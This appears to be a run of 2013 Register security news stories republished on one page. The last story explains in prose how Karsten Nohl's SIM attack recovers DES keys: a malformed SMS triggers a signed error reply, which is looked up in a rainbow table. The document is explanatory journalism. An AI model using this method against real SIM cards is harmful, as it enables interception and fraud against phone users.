STE WILLIAMS

New Kiwi spook law allows domestic prying

Cloud storage: Lower cost and increase uptime

New Zealand’s Government Communications Security Bureau (GCSB), which illegally spied on resident Kim Dotcom, is on the cusp of gaining sweeping new powers that include wiretapping NZ citizens.

The GCSB’s domestic spying first came to light last year when it mistakenly tapped Dotcom’s communications, not realising that his residency status at the time meant its actions were illegal. Rather than punish the organisation for its domestic snooping blunders, the New Zealand government has spent some time steering new laws through parliament to increase the GCSB’s powers.

The legislation had been resisted by opposition parties until the leader of New Zealand’s United Future party Peter Dunne negotiated amendments to the bill. According to the New Zealand Herald, these include regular reviews of the GCSB and the country’s domestic spy agency, the SIS; annual declaration of how many times the GCSB makes its facilities available to local agencies; and annual reports of warrants issued against locals.

However, the capacity of the GCSB to spy on locals – the reason for opposition to it – remains intact.

With the United Future party agreeing to support the bill, it will now have the numbers to get through parliament.

InternetNZ has noted that the changes to the bill haven’t yet been formally documented and has received the mooted changes cautiously. The bill with the proposed amendments is to be returned to parliament later this week.

However, QC Rodney Harrison has criticised the changes as holding out “false hope” that the GCSB won’t abuse its spying powers. The NZ Herald says Harrison and Kim Dotcom are planning a protest meeting to rally resistance to the bill. ®

Cloud storage: Lower cost and increase uptime

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/24/kiwis_set_to_get_new_spook_law/

Top server host OVH warns of ‘multi-stage’ hacking attack

Magic Quadrant for Enterprise Backup/Recovery

French-based server host OVH has warned that its systems have been penetrated in a multi-stage attack that leaves US and European customers at risk.

In an advisory on its forum board, the company warned that an attacker had gained control of a system administrator’s account, and used that to gain access to a VPN account of one of the firm’s backoffice staff. This was used to get the personal data of customers in Europe and from a hosting firm in Canada.

“Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases,” the company said.

“In short, we were not paranoid enough so now we’re switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH.”

European customers’ surname, first name, nic, address, city, country, telephone, fax, and encrypted password are all open to the attackers, and customers of the firm’s Canadian hosting company have ben advised to change SSH keys to ensure a secure connection.

The company is staying mum about what exact data has been scraped, but has filed a complaint about the issue to local judicial authorities.

This isn’t the first time OVH has suffered an attack. Back in May the company warned that its backoffice functions had been breached by hackers unknown and passwords were stolen. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/top_server_host_ovh_warns_of_multistage_hacking_attack/

E-shopkeepers stabbed with SQL needles ‘twice’ as much as other sites

Magic Quadrant for Enterprise Backup/Recovery

Retailers suffer twice as many SQL injection attacks on their systems as other industries, according to a new study by data-centre security firm Imperva, which claims the ferocity of web-based assaults is growing.

The fourth annual edition of Imperva’s Web Application Attack Report [PDF] also revealed that e-shopping applications received “749 individual attack requests per attack campaign” on average.

SQL injections exploit vulnerabilities in software that does not correctly or sufficiently clean up user-submitted data, allowing hackers to (for example) hijack database searches to retrieve private information, alter sensitive data or execute arbitrary commands.

Online shops have plenty of goodies, namely customer credit card details, in their databases for hackers to swipe, which explains why they were disproportionately targeted by SQL probing, said Amichai Shulman, Imperva’s chief technology officer.

According to the report, the US kept its place as the number-one source of web attacks; the majority of requests and attackers originated in America, Western Europe, China and Brazil. While a typical attack lasted around five minutes, we’re told, the worst recorded incident lasted more than 15 hours. Most of the web apps surveyed by Imperva received four or more attacks per month.

“While most of the 70 web applications monitored were attacked a significant amount, some received an astounding number of attacks – with one application receiving up to an average of 26 per minute,” said Shulman.

“While these findings undeniably demonstrate that web application attacks are far from consistently distributed, the takeaway is that organizations should base security measures on the worst case scenario, not on the average case.”

Shulman told El Reg that hackers are setting up more and more automated assaults, threatening therefore a greater number of web-based applications.

Dwayne Melancon, chief technology officer at security tools vendor TripWire, said web stores have improved their information security policies after years of being hammered by hackers.

“Retailers have traditionally been attractive targets for cyber attacks because they have widely distributed networks, they handle payment data, and many of them have taken a ‘bare minimum’ approach when it comes to funding information security,” Melancon claimed.

“Thankfully, this is beginning to change as retail executives see the negative impact that data breaches can have on repeat sales customer relationships.”

Imperva’s study involved matching events to known attack signatures, comparing attack sources to black lists of malicious hosts, and reviewing specific attributes of malicious traffic. The reports aims to paint a comprehensive picture of the web attack threat landscape by outlining the frequency, type, and geographical of origin of each attack. The result is a study that Imperva hopes will help security professionals prioritise their vulnerability remediation efforts.

The study focused on looking at six types of web application attack: SQL injection, remote file inclusion, local file inclusion, directory traversal, cross-site scripting, email extraction and comment spamming. Logs from six months of attacks against Imperva’s customers were used to compile the final report, published on Tuesday. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/imperva_web_app_threat_survey/

Cisco coughs $2.7bn for Sourcefire

Magic Quadrant for Enterprise Backup/Recovery

Cisco has dug deep and found $2.7bn for intrusion prevention security player Sourcefire.

Sourcefire started out in intrusion detection/intrusion prevention but expanded over the years to add next-generation firewall and advanced malware protection wares to its portfolio.

Cisco reckons the acquisition will accelerate the delivery of its security strategy of “defending, discovering, and remediating the most critical threats”.

It also claimed industry developments such as mobility, the cloud and extending net connectivity to a vast new range of devices (the so-called ‘Internet of Everything’) are changing the security landscape, forcing a new approach that the Cisco /Sourcefire combo hopes to bring to the table.

“Traditional disparate products [are] insufficient to protect organizations from dynamic threats,” Cisco claimed.

The duo hope to offer “advanced security threat protection across the entire attack continuum and from any device to any cloud”.

The deal is the biggest in the information security industry since Intel bought McAfee three years ago for $7.68 billion.

Under the terms of the deal, Cisco is offering $76 per share in cash in exchange for each share of Sourcefire, a premium of around 28 per cent on Monday’s closing price of $59.08.

Sourcefire was founded by Martin Roesch, the creator of Snort, a popular open-source intrusion detection engine, back in 2001. The firm previously accepted a $225 million takeover bid from Check Point way back in 2005 but the Israeli firm withdrew its offer after it became clear the US legislators were lining up to block the acquisition. Sourcefire’s technology played a key part in protecting US infrastructure systems and US politicians were wary about seeing control of this technology passing over to an Israeli firm.

Two years later, Sourcefire went public raising $86.3 million in the process. Sourcefire rejected a $187 million offer from security and storage appliance vendor Barracuda Networks in May 2008.

For year ending 31 December 2012, Sourcefire reported revenue of $223.1 million, an increase of 35 per cent year-on-year. The company is based in Columbia, MD and employs 650 people worldwide.

Cisco’s acquisition of Sourcefire gives it extra ammunition in its fight against competitors such as Check Point, Symantec, Juniper and McAfee/Intel in the security appliances and services market. It also boosts its tech line-up against system vendors such as IBM and HP.

Clive Longbottom of industry analysts Quocirca, said buying Sourcefire bolsters Cisco ability to deliver complete systems, not just networking components.

“Cisco wants to ‘own’ the whole stack, and Sourcefire bolsters its capabilities on the security front,” Longbottom said.

“Building this in to UCS [Unified Computing System] would definitely give a better ongoing engineered system to continue playing against the VCE V-Blocks, IBM PureSystems and Dell V-Starts and so on. It may also provide better capabilities straight into its switches – but this could mean messing with IOS to ensure that the security worked at line speed.”

Cisco will have to align Sourcefire’s technologies against the push towards Software Defined Networking, which is changing the shape of data centres, according to Longbottom.

“SDN is coming along,” Longbotton argued, “The idea here is to take all the smarts out from the switch and move it to commodity servers. Therefore, instead of each switch being stand-alone intelligent (and falling out when updates are applied at different levels across the switches), a higher-level management system is put in place that works across the whole switch estate, rather than one at a time. This makes applying network policies and dealing with network traffic issues far ‘cleaner’.”

“Cisco has said that it will adopt SDN using OpenFlow – but we have yet to see how ‘standard’ this will be. My view is that we will end up with a hybrid system of some functions being dealt with via an SDN layer, but some stuff will still be dealt with via ASICs and FPGAs and code in the switches themselves.”

“Sourcefire could find that a lot of what is there moves up to the SDN level – in which case it becomes swap outable for another vendor’s software.  What Cisco may do is embed bits of Sourcefire capabilities into UCS and into certain switches where maximum packet performance is required and provide it as an offering for those who want standard switches but a total Cisco network management approach.  In some cases, Cisco will just accept that the user will choose a different systems/network management tool with its own OpenFlow SDN capabilities,” he added. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/cisco_buys_sourcefire/

Ubuntuforums.org cracker promises no password release

He’s still a tool.

– and I’m being polite here – for doing what he did. For pities sake, it’s not like Ubuntu are a third world despotic nation, hell bent on subjugating native tribes with WMD, is it? No, they work as volunteers to release a fairly effective FREE alternative to Windows, iOS, et al, which is used by millions (well, tens of thousands, anyhow) around the globe. And this spotty-faced git decides, on a whim, to upset the apple cart and screw them over? Doesn’t bloody matter f he’s not going to use the passwords. Doesn’t matter much if they were salted, peppered, or covered in tomato sauce: He was wrong to do what he did. End of.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/ubuntuforums_cracker_promises_no_password_release/

Tango down! Chat app millions ransacked by pro-Assad hacktivists

Cloud storage: Lower cost and increase uptime

Hacktivists loyal to Syria’s president Bashar al-Assad claim to have extracted 1.5TB of sensitive data from chat app Tango.

The Syrian Electronic Army, best known for hacking into the official Twitter feeds of the Associated Press and The Guardian, boasted it swiped the mobile numbers and contact details of millions of users of the popular messaging and gaming platform:

The Syrian Electronic Army [SEA] hacked the Tango app (video/text messages service) website and database. The databases content a of millions of the app users phone numbers and contacts and their emails More than 1,5 TB of the daily-backups of the servers network has been downloaded successfully.

SEA posted screenshots (here and here) to back up its claims. “Much of the information in the databases that were downloaded will be delivered to the Syrian government,” it said.

eHackingnews, which broke the story, reported that Tango was hit thanks to a vulnerable WordPress installation, based on screenshots of the hack supplied by the SEA.

Tango confirmed it had suffered an intrusion via updates to its official Twitter feed on Saturday.

“Tango experienced a cyber intrusion that resulted in unauthorized access to some data. We are working on increasing our security systems,” it said, adding “We sincerely apologize for any inconvenience this breach may have caused our members.”

Tango’s blog is unreachable and its main website resolves to its official Facebook page at the time of writing on Monday. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/tango_chat_smackdown/

Symantec snaps up PasswordBank, touts SSO logins to biz

Cloud storage: Lower cost and increase uptime

Symantec has bought enterprise-focused authentication software start-up PasswordBank in a move aimed at beefing up its enterprise security software roster.

PasswordBank provides identity-as-a-service through enterprise and cloud-based single sign on services, as well as a line of multi-factor authentication-as-a-service technologies. The Spanish startup has said nothing about the deal on either its site or infrequently updated blog.

However, Symantec confirmed its purchase of PasswordBank, first rumoured over the weekend, via a brief statement in response to El Reg‘s inquiries on the matter. Financial terms of the deal, revealed on Monday, remain unconfirmed.

Symantec has acquired PasswordBank, a company with less than 20 employees based in Barcelona, Spain. PasswordBank is an independent provider of multifactor authentication, single sign on (SSO) and user management services.

Symantec will use PasswordBank’s expertise in single sign on technology to extend Symantec’s functionality in secure sign on for web or cloud applications and further enhance its identity and context aware security, a key strategic initiative. Symantec is not disclosing any other details about this deal at this time.

Single sign-on (SSO) technology has been a philosopher’s stone for segments of the security industry for years because it offers the promise of drastically reducing the number of passwords that enterprise users must remember, drastically reducing the burden on help-desks in the process. The technology can be delivered through either appliances or services.

In practice, SSO offers a way to reduce the amount of passwords corporates are obliged to manage but doesn’t achieve the one-password-to-rule-them-all goal the marketing hype around the technology promises. So say IT directors at large enterprises El Reg spoke to about the subject. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/symantec_passwordbank_purchase/

Oi, Google, you ate all our Wi-Fi keys

Cloud storage: Lower cost and increase uptime

Privacy experts have urged Google to allow Android users’ to encrypt their backups in the wake of the NSA PRISM surveillance flap.

The useful “back up my data” option in Google’s Android operating system sends a lot of private information from fandroids’ devices to Google’s cloud storage service. Such sensitive data includes wireless network passwords, application files and configuration settings.

These backed-up bytes are probably stored in an encrypted form on the advertising giant’s servers. However, if it is encrypted, then it’s Google that has the decryption keys, not the person or organisation that owns the data. As such, the information is vulnerable to secret demands from government agents and cops for that data.

If users had the cryptographic keys then at least they are aware of the surveillance and have a chance of personally fighting the request.

Micah Lee – a staff technologist at privacy warrior outfit the Electronic Frontier Foundation and the maintainer of HTTPS Everywhere – argues that encrypted backups should be available. He outlined his wishes in a recent post to the Android Open Source Project.

“The ‘back up my data’ option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data,” Lee writes.

Backup data is already encrypted in transit (just like secure web traffic) so it cannot be intercepted by any old miscreant – but users don’t have control over the encryption keys to their private data when at rest in Google’s machines, a situation Lee would like to see changed.

“You could implement this the same way Chrome’s sync feature is implemented, with two options: encrypt synced passwords with your Google credentials and encrypt all synced data with your own sync passphrase,” Lee argues.

“Since backup and restore is such a useful feature, and since it’s turned on by default, it’s likely that the vast majority of Android users are syncing this data with their Google accounts. Because Android is so popular, it’s likely that Google has plaintext wifi passwords for the majority of password-protected wifi networks in the world,” he adds.

Other security experts echo Lee’s concerns.

“[The data is] not encrypted in the sense of being inaccessible to anyone except you,” explains security industry veteran Paul Ducklin in a post on Sophos’s Naked Security blog. “That’s obvious because, as a comment on Micah’s posting pointed out, you can recover your data from Google even after you’ve wiped (or lost) your device, or changed your Google account password.”

“In other words, Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently even if you forget your device password and have to start over,” he added.

The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user’s home, and include hotels, shops, libraries, friends’ houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents.

“The solution is to encrypt everything ‘for your eyes only’ before you back it up anywhere, especially into the cloud,” Ducklin concludes.

In a statement, Google said the backup feature is optional and built to be secure. Although a debate on the feature continues on the Android developer forum, Google didn’t seem convinced about the need for any changes:

Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch.

At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks.

Lee concedes that by using an operating system developed by Google that users are extending a fair degree of trust to the Chocolate Factory. His point is not that that trust shouldn’t extend to Wi-Fi passwords: at the very least, users should be given a choice.

“While using Android requires a certain amount of trusting Google, I don’t think it’s rational to expect users to trust Google with their plaintext passwords when Google can be compelled to give this data to the US government when they request it,” Lee concludes. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/google_wlan_password_backup_flap/

Phantom apps appear in Chinese fanbois’ iTunes accounts

Cloud storage: Lower cost and increase uptime

Chinese fanbois are reporting that mobile apps they didn’t buy have started appearing in their iTunes accounts, leading to speculation an app promotion company may be illegally accessing accounts.

The scale of the problem is unclear at this stage but it’s been enough to persuade staff at popular local app forum iApps to investigate, according to TechInAsia.

The team discovered that many of the apps found by users (which they hadn’t purchased) were local mobile games that now enjoy high rankings on Apple’s charts.

iApps speculated that this could be the work of an unscrupulous promotion company somehow accessing accounts and downloading those apps it had been paid to promote.

The site claimed it may have been able to do this if the handsets were jailbroken, or possibly thanks to third party synchronisation tools which gather Apple ID info.

Both are pretty popular among Chinese fanbois and certainly some of those who found the phantom apps in their iTunes revealed that they had jailbroken their handsets – a strategy not recommended by Cupertino.

A third possible explanation is that these users have shared their Apple ID with friends and family – again a relatively common practice in China.

Apple didn’t have any official comment to make when contacted by El Reg.

The news comes just days after Apple was forced to close its Developer Centre website after worries it was being hacked.

However, the two incidents are unlikely to be linked, given that Turkish security researcher Ibrahim Balic has now publically claimed it was he who attacked the site in order to report security bugs in the system. ®

Magic Quadrant for Enterprise Backup/Recovery

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/23/china_itunes_phantom_app_downloads/

Mobe SIM crypto hijack threatens millions: Here’s HOW IT WORKS

Cloud storage: Lower cost and increase uptime

Analysis A German researcher reckons he can take control of your phone’s SIM card and hijack the handset by cracking the encryption on the device.

But he’s not alone: network operators have long been able to do just that, and a careful look at how that’s possible makes the long-standing security of GSM phone networks all the more remarkable.


GSM networks are secured by shared secrets. A unique cryptographic key is issued to each subscriber and embedded in their phone’s SIM card; a copy of that key is held by the network allowing mutual authentication by symmetric encryption (the same key is used at both ends).

Despite successful assaults on other parts of the GSM infrastructure those private keys have remained beyond the grasp of hackers, at least until now.

Pedigree security researcher Karsten Nohl has apparently discovered two unrelated flaws in implementations of the GSM standard that (when combined) could leave millions of SIM cards vulnerable to attack. Such attacks could permit call interception, and threaten the security of NFC applications (such as pay by wave) just as the tech is on the cusp of going mainstream.

Getting the secret key off a SIM isn’t easy – but increases in computing power have combined with poor implementations to create the first flaw exploited by Nohl, which reveals the secret key that should be known only to the network operator and the SIM.

Nohl’s crack uses an SMS message addressed to the SIM, and unseen by the user. This is normal enough; SIM messages come in four classes (0-3) addressed to the user, the handset, the SIM, and a tethered device respectively. Class 0 is the one we all know and love, but Class 2 (addressed to the SIM) remains surprisingly popular even if the other classes are all but forgotten.

The most common Class 2 message contains changes to the list of preferred roaming partners, to reflect new deals between operators, but the Global Platform standard permits anything, even the entire operating system, to be changed using signed Class 2 messages.

Such radical updates are rare, but they have happened and are secured using that shared secret, so knowledge of the key confers significant power.

This should already be setting off alarm bells

Nohl’s crack starts with a malformed Class 2 message. Anyone can send such a message using a software SMS Centre (SMSC), or even an old handset as some permitted a user-selected class. That message is rejected by the receiving SIM as it’s not signed, usually the message is just discarded but some SIMs apparently respond with a digitally signed error message that can be used to reveal their secret key.

Digital signatures shouldn’t reveal the keys used to sign them; that would defeat the object, but in this case it seems that some do.

The digital signature sent over with the error message is a one-way hash: a fixed-length summary of the message that is generated using the secret key. Anyone can calculate the hash using the received message; if the calculated hash using the secret key matches the hash included with the message, then the received data can be verified as genuine and trustworthy.

But Nohl’s team used a rainbow table to deduce the key from the signature.

The error message is a standard one – it doesn’t change between handsets – so by generating a list of every possible key value, a rainbow table of every possible hash value can be calculated for this one particular message. So an attacker simply takes the signature from the phone and looks it up in the rainbow to discover the secret key.

Every bit of a key doubles the size of the rainbow table, and such techniques rapidly become impractical as keys get bigger, but some older SIMs are using 56-bit keys and old-style DES encryption which combines to make the rainbow technique viable, and where that happens the secret key can be quickly discovered.

Once you have the key, you can start signing your own command SMS messages to control a targeted mobile.

What can be done?

Operators can change the SIMs, and update the encryption, but users are surprisingly reluctant to slot a new SIM into their handsets – they become quite emotional about it, proud to be using decades-old chippery, which stalls upgrade programmes. It’s also expensive – adding a dollar to the cost of the SIM may seem like a small deal, but when a network has 10 million customers it becomes a significant expense.

Quite how many SIMs are using 56DES we don’t know; Kohl reckons to have tried a thousand over the last year or two and discovered a quarter are vulnerable. There’s no easy way to discover if a specific SIM is using 56DES, the operators store the information along with the keys, but the SIM won’t talk about the subject.

Armed with a key our miscreant can reprogram the SIM to do just about anything – redirect SMS messages, change the preferred network operator, run up enormous bills to premium-rate numbers and authenticate payments through services such as PayForIt. Modern SIMs can request an internet connection, furnished by the handset and generally without user interaction, through which our attacker can cause all sorts of mischief – though to get at the users’ bank details he’ll need Nohl’s second flaw.

Almost all SIMs (and credit cards) use JavaCard, a relation of Java still owned by Oracle, but having little in common with the cross-platform interpreted language beyond a bit of syntax. JavaCard is an operating system, not a language, and one which keeps applications (Cardlets, in the parlance) separated so they can’t talk to each other.

Nohl claims to have found a flaw in that separation, though he won’t be making the details public until next month’s Black Hat conference. Combining that flaw with possession of the secret key makes for a potent combination – pay-by-bonk applications, such as the one being launched by EE later this year, rely on the hitherto sacrosanct separation of JavaCard apps, so they’ll be a good deal of interest in Nohl’s talk from hat wearers of all colours.

GSM authentication, as opposed to encryption, has proved amazing resilient over the years. A fix for this problem will likely turn up pretty quickly with the ITU and GSMA falling over themselves to be associated with the solution, but if it needs replacement SIMs then that will be a longer process.

Operators should be quick to send out new SIM cards to customers still using 56DES, but the JavaCard vulnerability may prove harder to patch and we’ll get you details of that just as soon as we can. ®

Requirements Checklist for Choosing a Cloud Backup and Recovery Service Provider

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/07/22/mobile_gsm_sim_card_crypto_crack/